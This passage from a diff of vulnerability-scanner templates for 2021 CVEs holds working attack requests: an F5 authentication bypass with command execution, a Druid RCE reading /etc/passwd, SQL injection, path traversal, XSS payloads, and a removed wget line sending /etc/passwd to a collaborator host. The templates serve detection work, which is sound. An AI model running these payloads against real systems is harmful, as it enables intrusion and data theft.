+ reference: https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986
+ advisory: https://support.f5.com/csp/article/K03009991
+
+requests:
+ - raw:
+ - |
+ POST /mgmt/shared/authn/login HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Language: en
+ Authorization: Basic YWRtaW46
+ Content-Type: application/json
+ Cookie: BIGIPAuthCookie=1234
+ Connection: close
+
+ {"username":"admin","userReference":{},"loginReference":{"link":"http://localhost/mgmt/shared/gossip"}}
+ - |
+ POST /mgmt/tm/util/bash HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Language: en
+ X-F5-Auth-Token: §token§
+ Content-Type: application/json
+ Connection: close
+
+ {"command":"run","utilCmdArgs":"-c id"}
+
+ extractors:
+ - type: regex
+ part: body
+ internal: true
+ name: token
+ group: 1
+ regex:
+ - "([A-Z0-9]{26})"
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - "\"commandResult\":\"(.*)\""
+
+ matchers:
+ - type: word
+ words:
+ - "commandResult"
+ - "uid="
+ condition: and
diff --git a/cves/2021/CVE-2021-23241.yaml b/cves/2021/CVE-2021-23241.yaml
new file mode 100644
index 0000000000..8a834ac8d2
--- /dev/null
+++ b/cves/2021/CVE-2021-23241.yaml
@@ -0,0 +1,27 @@
+id: CVE-2021-23241
+
+info:
+ name: Mercury Router Web Server Directory Traversal
+ author: daffainfo
+ severity: medium
+ description: MERCUSYS Mercury X18G 1.0.5 devices allow Directory Traversal via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI.
+ reference: |
+ - https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-23241
+ tags: cve,cve2021,iot,lfi,router
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/loginLess/../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+ part: body
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2021/CVE-2021-24146.yaml b/cves/2021/CVE-2021-24146.yaml
new file mode 100644
index 0000000000..c950e67161
--- /dev/null
+++ b/cves/2021/CVE-2021-24146.yaml
@@ -0,0 +1,27 @@
+id: CVE-2021-24146
+
+info:
+ name: Modern Events Calendar Lite < 5.16.5 - Unauthenticated Events Export
+ description: Lack of authorisation checks in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, did not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format for example.
+ author: random_robbie
+ severity: high
+ reference: https://wpscan.com/vulnerability/c7b1ebd6-3050-4725-9c87-0ea525f8fecc
+ tags: wordpress,wp-plugin,cve,cve2021
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "mec-events"
+ - "text/csv"
+ condition: and
+ part: header
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2021/CVE-2021-24176.yaml b/cves/2021/CVE-2021-24176.yaml
new file mode 100644
index 0000000000..e79ac758f3
--- /dev/null
+++ b/cves/2021/CVE-2021-24176.yaml
@@ -0,0 +1,27 @@
+id: CVE-2021-24176
+
+info:
+ name: WordPress JH 404 Logger XSS
+ author: Ganofins
+ severity: medium
+ description: JH 404 Logger WordPress plugin through 1.1 doesn't sanitise the referer and path of 404 pages, when they are output in the dashboard, which leads to executing arbitrary JavaScript code in the WordPress dashboard.
+ references: |
+ - https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585
+ - https://wordpress.org/plugins/jh-404-logger/
+ tags: cve,cve2021,wordpress,wp-plugin,xss
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/jh-404-logger/readme.txt"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "JH 404 Logger"
+ part: body
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-24210.yaml b/cves/2021/CVE-2021-24210.yaml
new file mode 100644
index 0000000000..66627bd36e
--- /dev/null
+++ b/cves/2021/CVE-2021-24210.yaml
@@ -0,0 +1,20 @@
+id: CVE-2021-24210
+
+info:
+ name: PhastPress < 1.111 - Open Redirect
+ author: 0x_Akoko
+ description: There is an open redirect in the plugin that allows an attacker to malform a request to a page with the plugin and then redirect the victim to a malicious page.
+ reference: https://wpscan.com/vulnerability/9b3c5412-8699-49e8-b60c-20d2085857fb
+ severity: low
+ tags: wordpress,cve,cve2021,redirect
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Fexample.com"
+
+ matchers:
+ - type: regex
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+ part: header
diff --git a/cves/2021/CVE-2021-24235.yaml b/cves/2021/CVE-2021-24235.yaml
new file mode 100644
index 0000000000..6da6293c88
--- /dev/null
+++ b/cves/2021/CVE-2021-24235.yaml
@@ -0,0 +1,31 @@
+id: CVE-2021-24235
+
+info:
+ name: Goto - Tour & Travel < 2.0 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24235
+ tags: cve,cve2021,wordpress,xss,wp-theme
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "input/Autofocus/%0D*/Onfocus=alert(123);"
+ - "goto-tour-list-js-extra"
+ part: body
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2021/CVE-2021-24237.yaml b/cves/2021/CVE-2021-24237.yaml
new file mode 100644
index 0000000000..845fffe640
--- /dev/null
+++ b/cves/2021/CVE-2021-24237.yaml
@@ -0,0 +1,34 @@
+id: CVE-2021-24237
+
+info:
+ author: 0x_Akoko
+ name: Realteo WordPress Plugin <= 1.2.3 - Unauthenticated Reflected XSS
+ description: The plugin, used by the Findeo Theme, did not properly sanitise the keyword_search, search_radius.
+ severity: medium
+ tags: cve,cve2021,realteo,xss,wordpress
+ reference: |
+ - https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e
+ - https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/{{randstr}}/)%3B%2F%2F'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "autofocus onfocus=alert(/{{randstr}}/);//"
+ - "Nothing found"
+ part: body
+ condition: and
+
+ - type: word
+ words:
+ - "text/html"
+ part: header
diff --git a/cves/2021/CVE-2021-24285.yaml b/cves/2021/CVE-2021-24285.yaml
new file mode 100644
index 0000000000..14a1453f5d
--- /dev/null
+++ b/cves/2021/CVE-2021-24285.yaml
@@ -0,0 +1,33 @@
+id: CVE-2021-24285
+
+info:
+ name: Car Seller - Auto Classifieds Script WordPress plugin SQLI
+ author: ShreyaPohekar
+ severity: critical
+ description: The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitise, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL Injection issue.
+ tags: cve,cve2021,wordpress,wp-plugin,sqli
+ reference: |
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24285
+ - https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/
+ - https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162
+
+requests:
+ - raw:
+ - |
+ POST /wp-admin/admin-ajax.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+ Content-Length: 47
+
+ action=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "qzvvqhWAAlCfTiMDmAoqzkTpJEzPwVFSaIpfAfdfTinrMqqxkq"
+ part: body
diff --git a/cves/2021/CVE-2021-24291.yaml b/cves/2021/CVE-2021-24291.yaml
new file mode 100644
index 0000000000..3d7e73cfbc
--- /dev/null
+++ b/cves/2021/CVE-2021-24291.yaml
@@ -0,0 +1,31 @@
+id: CVE-2021-24291
+
+info:
+ name: Photo Gallery < 1.5.69 - Multiple Reflected Cross-Site Scripting (XSS)
+ author: geeknik
+ description: The plugin was vulnerable to Reflected Cross-Site Scripting (XSS) issues via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action (available to both unauthenticated and authenticated users)
+ reference: https://wpscan.com/vulnerability/cfb982b2-8b6d-4345-b3ab-3d2b130b873a
+ severity: medium
+ tags: cve,cve2021,xss,wordpress,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1"%20onmouseover=alert(document.domain)//'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: word
+ words:
+ - "onmouseover=alert(document.domain)//"
+ - "wp-content/uploads/photo-gallery"
+ condition: and
diff --git a/cves/2021/CVE-2021-24298.yaml b/cves/2021/CVE-2021-24298.yaml
new file mode 100644
index 0000000000..40b4fa673f
--- /dev/null
+++ b/cves/2021/CVE-2021-24298.yaml
@@ -0,0 +1,30 @@
+id: CVE-2021-24298
+
+info:
+ name: Simple Giveaways < 2.36.2 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The method and share GET parameters of the Giveaway pages were not sanitised, validated or escaped before being output back in the pages, thus leading to reflected XSS
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24298
+ tags: cve,cve2021,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2021/CVE-2021-24316.yaml b/cves/2021/CVE-2021-24316.yaml
new file mode 100644
index 0000000000..00b724d223
--- /dev/null
+++ b/cves/2021/CVE-2021-24316.yaml
@@ -0,0 +1,34 @@
+id: CVE-2021-24316
+
+info:
+ author: 0x_Akoko
+ description: Mediumish WordPress Theme <= 1.0.47 - Unauthenticated Reflected XSS & XFS.
+ name: An Unauthenticated Reflected XSS & XFS Mediumish theme through 1.0.47 for WordPress
+ severity: medium
+ tags: cve,cve2021,mediumish,xss,wordpress
+ reference: |
+ - https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e
+ - https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E '
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - ""
+ - "Sorry, no posts matched your criteria."
+ part: body
+ condition: and
+
+ - type: word
+ words:
+ - "text/html"
+ part: header
diff --git a/cves/2021/CVE-2021-24320.yaml b/cves/2021/CVE-2021-24320.yaml
new file mode 100644
index 0000000000..90776f8a1c
--- /dev/null
+++ b/cves/2021/CVE-2021-24320.yaml
@@ -0,0 +1,32 @@
+id: CVE-2021-24320
+
+info:
+ name: Bello WordPress Theme < 1.6.0 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The Bello - Directory & Listing WordPress theme before 1.6.0 did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing page, leading to reflected Cross-Site Scripting issues.
+ reference: |
+ - https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-79%5D-Bello-WordPress-Theme-v1.5.9.txt
+ - https://wpscan.com/vulnerability/6b5b42fd-028a-4405-b027-3266058029bb
+ tags: cve,cve2021,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2021/CVE-2021-24335.yaml b/cves/2021/CVE-2021-24335.yaml
new file mode 100644
index 0000000000..960dfbe32b
--- /dev/null
+++ b/cves/2021/CVE-2021-24335.yaml
@@ -0,0 +1,30 @@
+id: CVE-2021-24335
+
+info:
+ name: Car Repair Services < 4.0 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The Car Repair Services & Auto Mechanic WordPress theme before 4.0 did not properly sanitise its serviceestimatekey search parameter before outputting it back in the page, leading to a reflected Cross-Site Scripting issue
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24335
+ tags: cve,cve2021,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2021/CVE-2021-24340.yaml b/cves/2021/CVE-2021-24340.yaml
new file mode 100644
index 0000000000..0f6578244b
--- /dev/null
+++ b/cves/2021/CVE-2021-24340.yaml
@@ -0,0 +1,33 @@
+id: CVE-2021-24340
+
+info:
+ name: WordPress Plugin WP Statistics 13.0-.7 - Unauthenticated Time-Based Blind SQL Injection
+ author: lotusdll
+ severity: critical
+ description: The WP Statistic WordPress plugin was affected by an Unauthenticated Time-Based Blind SQL Injection security vulnerability.
+ reference: |
+ - https://www.exploit-db.com/exploits/49894
+ - https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/
+ - https://github.com/Udyz/WP-Statistics-BlindSQL
+ tags: cve,cve2021,wordpress,wp-plugin,unauth,sqli,blind
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/wp-statistics/readme.txt'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "WP Statistics"
+ part: body
+
+ - type: regex
+ regex:
+ - 'Stable tag\: [1][3]\.[0].([1]|[2]|[3]|[4]|[5]|[6]|[7])|[1][3]\.[0]$'
+ part: body
diff --git a/cves/2021/CVE-2021-24387.yaml b/cves/2021/CVE-2021-24387.yaml
new file mode 100644
index 0000000000..6c944264c9
--- /dev/null
+++ b/cves/2021/CVE-2021-24387.yaml
@@ -0,0 +1,31 @@
+id: CVE-2021-24387
+
+info:
+ name: Real Estate 7 WordPress Theme < 3.1.1 - Unauthenticated Reflected XSS
+ author: suman_kar
+ description: XSS in wordpress via ct_community parameter
+ severity: medium
+ tags: cve,cve2021,xss,wordpress
+ reference: https://cxsecurity.com/issue/WLB-2021070041
+
+requests:
+ - raw:
+ - |
+ GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: gzip, deflate
+ Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
+ Connection: close
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ''
+ - '/wp-content/themes/realestate'
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2021/CVE-2021-24389.yaml b/cves/2021/CVE-2021-24389.yaml
new file mode 100644
index 0000000000..3b6b1bb833
--- /dev/null
+++ b/cves/2021/CVE-2021-24389.yaml
@@ -0,0 +1,30 @@
+id: CVE-2021-24389
+
+info:
+ name: FoodBakery < 2.2 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The WP Foodbakery WordPress plugin before 2.2, used in the FoodBakery WordPress theme before 2.2 did not properly sanitize the foodbakery_radius parameter before outputting it back in the response, leading to an unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24389
+ tags: cve,cve2021,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2021/CVE-2021-24406.yaml b/cves/2021/CVE-2021-24406.yaml
new file mode 100644
index 0000000000..5ef2b21f2c
--- /dev/null
+++ b/cves/2021/CVE-2021-24406.yaml
@@ -0,0 +1,20 @@
+id: CVE-2021-24406
+
+info:
+ name: wpForo Forum < 1.9.7 - Open Redirect
+ author: 0x_Akoko
+ description: The plugin did not validate the redirect_to parameter in the login form of the forum, leading to an open redirect issue after a successful login.
+ reference: https://wpscan.com/vulnerability/a9284931-555b-4c96-86a3-09e1040b0388
+ severity: low
+ tags: wordpress,redirect,cve,cve2021
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/community/?foro=signin&redirect_to=https://example.com/"
+
+ matchers:
+ - type: regex
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+ part: header
diff --git a/cves/2021/CVE-2021-24472.yaml b/cves/2021/CVE-2021-24472.yaml
new file mode 100644
index 0000000000..0b37b8ef3d
--- /dev/null
+++ b/cves/2021/CVE-2021-24472.yaml
@@ -0,0 +1,29 @@
+id: CVE-2021-24472
+
+info:
+ author: Suman_Kar
+ name: Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Unauthenticated RFI and SSRF
+ description: The theme and plugin have exposed proxy functionality to unauthenticated users, sending requests to this proxy functionality will have the web server fetch and display the content from any URI, this would allow for SSRF (Server Side Request Forgery) and RFI (Remote File Inclusion) vulnerabilities on the website.
+ severity: high
+ reference: https://wpscan.com/vulnerability/17591ac5-88fa-4cae-a61a-4dcf5dc0b72a
+ tags: cve,cve2021,wordpress,lfi,ssrf,oob
+
+requests:
+ - raw:
+ - |
+ GET /?qtproxycall=http://{{interactsh-url}} HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{BaseURL}}
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2021/CVE-2021-24495.yaml b/cves/2021/CVE-2021-24495.yaml
new file mode 100644
index 0000000000..35d8f8ffab
--- /dev/null
+++ b/cves/2021/CVE-2021-24495.yaml
@@ -0,0 +1,33 @@
+id: CVE-2021-24495
+
+info:
+ name: Wordpress Plugin Marmoset Viewer XSS
+ author: johnjhacking
+ severity: medium
+ tags: cve,cve2021,wp-plugin,wordpress,xss
+ reference: |
+ - https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/
+ - https://wordpress.org/plugins/marmoset-viewer/#developers
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://
"
+ - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - ""
+ - "alert(/{{randstr}}/)"
+ part: body
+ condition: or
+
+ - type: word
+ words:
+ - "Marmoset Viewer"
diff --git a/cves/2021/CVE-2021-24498.yaml b/cves/2021/CVE-2021-24498.yaml
new file mode 100644
index 0000000000..64eccc35f9
--- /dev/null
+++ b/cves/2021/CVE-2021-24498.yaml
@@ -0,0 +1,36 @@
+id: CVE-2021-24498
+
+info:
+ name: Calendar Event Multi View < 1.4.01 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+ author: suman_kar
+ description: The plugin does not sanitise or escape the 'start' and 'end' GET parameters before outputting them in the page (via php/edit.php), leading to a reflected Cross-Site Scripting issue.
+ severity: medium
+ tags: cve,cve2021,xss,wordpress,wp-plugin
+ reference: https://wpscan.com/vulnerability/3c5a5187-42b3-4f88-9b0e-4fdfa1c39e86
+
+requests:
+ - raw:
+ - |
+ GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: gzip, deflate
+ Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
+ Connection: close
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '><'
+ - 'Calendar Details'
+ part: body
+ condition: and
+
+ - type: word
+ words:
+ - 'text/html'
+ part: header
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2021/CVE-2021-25281.yaml b/cves/2021/CVE-2021-25281.yaml
new file mode 100644
index 0000000000..40bbfa226a
--- /dev/null
+++ b/cves/2021/CVE-2021-25281.yaml
@@ -0,0 +1,40 @@
+id: CVE-2021-25281
+
+info:
+ name: CVE-2021-25281 - SaltStack wheel_async unauth access
+ author: madrobot
+ severity: critical
+ reference: http://hackdig.com/02/hack-283902.htm
+ description: The SaltAPI does not honor eauth credentials for the wheel_async client. Thus, an attacker can remotely run any wheel modules on the master.
+ tags: cve,cve2021,saltapi,rce,saltstack
+
+requests:
+ - raw:
+ - |
+ POST /run HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Accept-Language: en
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+ Content-Type: application/json
+ Content-Length: 173
+ Connection: close
+
+ {"client":"wheel_async","fun":"pillar_roots.write","data":"testing","path":"../../../../../../../tmp/testing","username":"1","password":"1","eauth":"pam"}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "return"
+ - "tag"
+ - "jid"
+ - "salt"
+ - "wheel"
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2021/CVE-2021-25646.yaml b/cves/2021/CVE-2021-25646.yaml
index 8178b8dbfd..a1128591fe 100644
--- a/cves/2021/CVE-2021-25646.yaml
+++ b/cves/2021/CVE-2021-25646.yaml
@@ -13,25 +13,47 @@ info:
requests:
- raw:
- |
- POST /druid/indexer/v1/sampler?for=example-manifest HTTP/1.1
+ POST /druid/indexer/v1/sampler HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Type: application/json
Content-Length: 1006
Connection: close
- {"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["https://druid.apache.org/data/example-manifests.tsv"]},"inputFormat":{"type":"tsv","findColumnsFromHeader":true}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"timestamp","missingValue":"2010-01-01T00:00:00Z"},"dimensionsSpec":{},"transformSpec":{"transforms":[],"filter":{"type": "javascript",
- "function": "function(value){return java.lang.Runtime.getRuntime().exec('wget example.com')}",
- "dimension": "added",
- "": {
- "enabled": "true"
- }
- }
- }
- },"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":50,"timeoutMs":10000}}
+ {
+ "type":"index",
+ "spec":{
+ "ioConfig":{
+ "type":"index",
+ "firehose":{
+ "type":"local",
+ "baseDir":"/etc",
+ "filter":"passwd"
+ }
+ },
+ "dataSchema":{
+ "dataSource":"odgjxrrrePz",
+ "parser":{
+ "parseSpec":{
+ "format":"javascript",
+ "timestampSpec":{
- # To read system Files, replace (wget example.com) with below payload
- # wget --post-file /etc/passwd http://xxxxxxx.burpcollaborator.net
+ },
+ "dimensionsSpec":{
+
+ },
+ "function":"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"/bin/sh`@~-c`@~cat /etc/passwd\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"4137368\",OQtGXcxBVQVL: hTVCCerYZ}}",
+ "":{
+ "enabled":"true"
+ }
+ }
+ }
+ }
+ },
+ "samplerConfig":{
+ "numRows":10
+ }
+ }
matchers-condition: and
matchers:
@@ -42,10 +64,15 @@ requests:
words:
- "application/json"
part: header
- condtion: and
- - type: regex
- regex:
+
+ - type: word
+ words:
- "numRowsRead"
- "numRowsIndexed"
part: body
- condtion: and
+ condition: and
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ part: body
diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml
new file mode 100644
index 0000000000..dfc0d7f0c7
--- /dev/null
+++ b/cves/2021/CVE-2021-26295.yaml
@@ -0,0 +1,64 @@
+id: CVE-2021-26295
+info:
+ name: Apache OFBiz RMI deserializes Arbitrary Code Execution
+ author: madrobot
+ severity: critical
+ tags: apache,cve,cve2021,rce,ofbiz
+ description: Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz.
+ reference: |
+ - https://github.com/yumusb/CVE-2021-26295-POC
+ - https://lists.apache.org/thread.html/r3c1802eaf34aa78a61b4e8e044c214bc94accbd28a11f3a276586a31%40%3Cuser.ofbiz.apache.org%3E
+ - https://lists.apache.org/thread.html/r6e4579c4ebf7efeb462962e359501c6ca4045687f12212551df2d607@%3Cnotifications.ofbiz.apache.org%3E
+
+ # Note:- This is detection template, To perform deserializes do as below
+ # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot
+ # `cat mad.ot | hex` and replace in along with the url in std-String value
+ # Exploit: https://github.com/yumusb/CVE-2021-26295-POC
+
+requests:
+ - raw:
+ - |
+ POST /webtools/control/SOAPService HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Accept-Language: en
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
+ Connection: close
+ Content-Type: application/xml
+ Content-Length: 910
+
+
+
+
+
+
+
+
+ bcc62005737220116a6176612e7574696c2e486173684d617005070c341c16606403200246200a6c6f6164466163746f724920097468726573686f6c6478703f4020202020200c770820202010202020017372200c6a6176612e6e65742e55524cfb2537361a7fa37203200749200868617368436f6465492004706f72744c2009617574686f726974797420124c6a6176612f6c616e672f537472696e673b4c200466696c6571207e20034c2004686f737471207e20034c200870726f746f636f6c71207e20034c200372656671207e20037870a0a0a0a0a0a0a0a07420107435336c71392e646e736c6f672e636e7420012f71207e2005742004687474707078742018687474703a2f2f7435336c71392e646e736c6f672e636e2f780a
+
+
+
+
+
+
+
+
+
+
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "OFBiz.Visitor="
+ part: header
+ - type: word
+ words:
+ - "deserializing"
+ - "errorMessage"
+ part: body
+ condition: and
diff --git a/cves/2021/CVE-2021-26475.yaml b/cves/2021/CVE-2021-26475.yaml
new file mode 100644
